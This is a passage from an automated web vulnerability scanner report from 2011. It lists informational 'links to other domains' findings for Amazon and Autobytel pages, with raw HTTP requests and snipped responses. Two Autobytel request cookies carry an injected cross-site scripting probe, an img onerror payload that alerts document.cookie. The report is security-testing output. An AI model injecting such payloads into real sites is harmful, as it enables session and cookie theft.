<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/177-3345764-3077262"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.554. http://www.amazon.com/music-rock-classical-pop-jazz/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/music-rock-classical-pop-jazz/b

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/music-rock-classical-pop-jazz/b?ie\\x3dUTF8\\x26amp;node\\x3d5174\\x22

The response contains the following links to other domains:

http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif

Request

GET /music-rock-classical-pop-jazz/b?ie\\x3dUTF8\\x26amp;node\\x3d5174\\x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:26 GMT
Server: Server
x-amz-id-1: 0S03YGZH13FYDGVQHEZB
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: L/lGuyme01dn50YaJ8EP0PPn5pYb2js8JiU8U2cLmud0JxL0kOFLCeAjK4EdrWJ5
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-3286726-1147164; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144

<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...
<a href="/177-3286726-1147164"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif" width="142" height="31" border="0" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif" width="40" height="35" border="0" />
</td>
...[SNIP]...
<br />
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />
<b>
...[SNIP]...

20.555. http://www.amazon.com/toys/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/toys/b

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/toys/b?ie\\x3dUTF8\\x26amp;node\\x3d165793011\\x22

The response contains the following links to other domains:

http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif

Request

GET /toys/b?ie\\x3dUTF8\\x26amp;node\\x3d165793011\\x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:33 GMT
Server: Server
x-amz-id-1: 1QF99C3QCJJF5XR5QJ7P
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: qhlW+8nQRDOrcNraO1mGzwsF2kBkWiXnLrbc/30PXhTrjXKViwsrAGez04QEWjGO
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-0775702-1721755; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144

<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...
<a href="/188-0775702-1721755"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif" width="142" height="31" border="0" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif" width="40" height="35" border="0" />
</td>
...[SNIP]...
<br />
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />
<b>
...[SNIP]...

20.556. http://www.autobytel.com/content/buy/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.autobytel.com/content/buy/index.cfm?id=13148;ABTL

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?
http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?
http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?
http://www.autocheck.com/?WT.mc_id=1824&siteID=1824
http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm

Request

GET /content/buy/index.cfm?id=13148;ABTL HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /content/Search/index.cfm?id=13148;ABTL
Server: Microsoft-IIS/7.0
Content-Length: 11939
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:30:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:30:28 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:30:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<li><a href="http://www.autocheck.com/?WT.mc_id=1824&siteID=1824" title="Vehicle History Reports">Vehicle History Reports</a>
...[SNIP]...
<li><a href="http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm" title="Car Finder" >
               My Advisor
           </a>
...[SNIP]...


   <IFRAME SRC="http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?"></SCRIPT>
       <NOSCRIPT>
           <A HREF="http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?"><IMG SRC="http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A27398-0D71-2922-D4AC6FB50C81ECE3|||13148|||;sz=728x90;ptile=1;!cat=;ord=22398696?" border=0 height="90" width="728"></A>
...[SNIP]...

20.557. http://www.autobytel.com/content/home/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.autobytel.com/content/home/help/index.cfm?id=13148;ABTL&action=privacy

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=1x3;!cat=;ord=31515196?
http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
http://an.tacoda.net/an/17295/slf.js
http://finance.car.com/
http://js.revsci.net/gateway/gw.js?csid=K04491
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://rt.displaymarketplace.com/optout.html
http://smp.specificmedia.com/smp/v=5;m=1;t=2568;ts=1295912311270
http://tags.bluekai.com/site/10?ret=html
http://www.autocheck.com/?WT.mc_id=1824&siteID=1824
http://www.autotropolis.com/
http://www.autoweb.com/
http://www.bkrtx.com/js/bk-static.js
http://www.car.com/
http://www.carsmart.com/
http://www.datranmedia.com/privacy/
http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm
http://www.myride.com/
http://www.networkadvertising.org/
http://www.networkadvertising.org/managing/opt_out.asp

Request

GET /content/home/help/index.cfm?id=13148;ABTL&action=privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:31 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:31 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55331

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<li><a href="http://www.autocheck.com/?WT.mc_id=1824&siteID=1824" title="Vehicle History Reports">Vehicle History Reports</a>
...[SNIP]...
<li><a href="http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm" title="Car Finder" >
               My Advisor
           </a>
...[SNIP]...


   <IFRAME SRC="http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?"></SCRIPT>
       <NOSCRIPT>
           <A HREF="http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?"><IMG SRC="http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?" border=0 height="90" width="728"></A>
...[SNIP]...
</a>,
<a
href="http://www.autotropolis.com/">http://www.autotropolis.com</a>,
<a href="http://www.autoweb.com/">http://www.autoweb.com</a>, <a
href="http://www.carsmart.com/">http://www.carsmart.com</a>, <a
href="http://www.car.com/">http://www.car.com</a>, <a
href="http://finance.car.com/">http://finance.car.com</a> and <a
href="http://www.myride.com/">http://www.myride.com</a>
...[SNIP]...
when you receive a new cookie. Use of third party cookies is subject to the privacy policies and opt-out procedures of these third parties and not Autobytel's policy and procedures. Please click here <a href="http://www.networkadvertising.org" target="_blank">www.networkadvertising.org</a>
...[SNIP]...
out the data and information collection and use practices of some of the third parties for which we set cookies on Autobytel Websites or for which we enable to set their own cookies. Please click here <a href="http://www.networkadvertising.org/managing/opt_out.asp" target="_blank">http://www.networkadvertising.org/managing/opt_out.asp</a>
...[SNIP]...
hich a cookie is set on your computer and which is not included in the preceding link is Datran Media's Aperture product. Datran Media's privacy policy can be viewed by clicking on the following link: <a href="http://www.datranmedia.com/privacy/" target="_blank">http://www.datranmedia.com/privacy/</a>. Should you wish to opt-out of Datran Media's cookies, you may access Datran Media's opt-out procedure by clicking on the following link: <a href="http://rt.displaymarketplace.com/optout.html" target="_blank">http://rt.displaymarketplace.com/optout.html</a>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=1x3;!cat=;ord=31515196?"></script>
...[SNIP]...
<TD ALIGN="center" class="SmallFont">

                           A D V E R T I S E M E N T


       <IFRAME SRC="http://ad.doubleclick.net/adi/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?">
       </SCRIPT>
       <NOSCRIPT>
           <A HREF="http://ad.doubleclick.net/jump/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?"><IMG SRC="http://ad.doubleclick.net/ad/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?" border=0 height="600" width="160"></A>
...[SNIP]...
</a> |
               <a href="http://www.myride.com" class="footernav" >MYRIDE.COM</a>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<noscript>
           <iframe name="__bknsframe" height=0 width=0 frameborder=0 src="http://tags.bluekai.com/site/10?ret=html"></iframe>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>


       <img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162" width="1" height="1" border="0" alt="">

       
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>



   <img src='http://smp.specificmedia.com/smp/v=5;m=1;t=2568;ts=1295912311270' width='0' height='1' border='0' />


...[SNIP]...

20.558. http://www.autobytel.com/content/home/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.autobytel.com/content/home/index.cfm?id=4;ABTL

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=586x90;ord=16681240?
http://ad.doubleclick.net/ad/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
http://ad.doubleclick.net/adi/abtl.home/fms;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=586x90;ord=16681240?
http://ad.doubleclick.net/adi/abtl.home/lsuv;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?
http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
http://ad.doubleclick.net/jump/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?
http://ad.doubleclick.net/jump/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
http://an.tacoda.net/an/17295/slf.js
http://fls.doubleclick.net/activityi;src=2819819;type=retar278;cat=autob211;ord=16681240?
http://js.revsci.net/gateway/gw.js?csid=K04491
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://smp.specificmedia.com/smp/v=5;m=1;t=2568;ts=1295912323426
http://tags.bluekai.com/site/10?ret=html
http://www.autocheck.com/?WT.mc_id=1824&siteID=1824
http://www.bkrtx.com/js/bk-static.js
http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm
http://www.myride.com/

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:43 GMT;path=/
Set-Cookie: ID=;expires=Sun, 24-Jan-2010 23:38:43 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70441

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<noscript>
       <iframe src="http://fls.doubleclick.net/activityi;src=2819819;type=retar278;cat=autob211;ord=16681240?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<li><a href="http://www.autocheck.com/?WT.mc_id=1824&siteID=1824" title="Vehicle History Reports">Vehicle History Reports</a>
...[SNIP]...
<li><a href="http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm" title="Car Finder" >
               My Advisor
           </a>
...[SNIP]...
<div>
<iframe src="http://ad.doubleclick.net/adi/abtl.home/lsuv;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?" name="frame1" width="369" height="78" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" border="0">
   <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?">
   </script>
   <noscript>
       <a href="http://ad.doubleclick.net/jump/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?"><img src="http://ad.doubleclick.net/ad/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?" border="0" height="78" width="369"></a>
...[SNIP]...
<div id="hp_adunit">
   <iframe src="http://ad.doubleclick.net/adi/abtl.home/fms;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=586x90;ord=16681240?" name="frame1" width="586" height="93" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
       <script language="Javascript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?">
       </script>
       <noscript>
           <a href="http://ad.doubleclick.net/jump/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?"><IMG SRC="http://ad.doubleclick.net/ad/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=586x90;ord=16681240?" border=0 height="93" width="586"></a>
...[SNIP]...
</a> |
               <a href="http://www.myride.com" class="footernav" >MYRIDE.COM</a>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<noscript>
           <iframe name="__bknsframe" height=0 width=0 frameborder=0 src="http://tags.bluekai.com/site/10?ret=html"></iframe>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>


       <img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162" width="1" height="1" border="0" alt="">

       
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
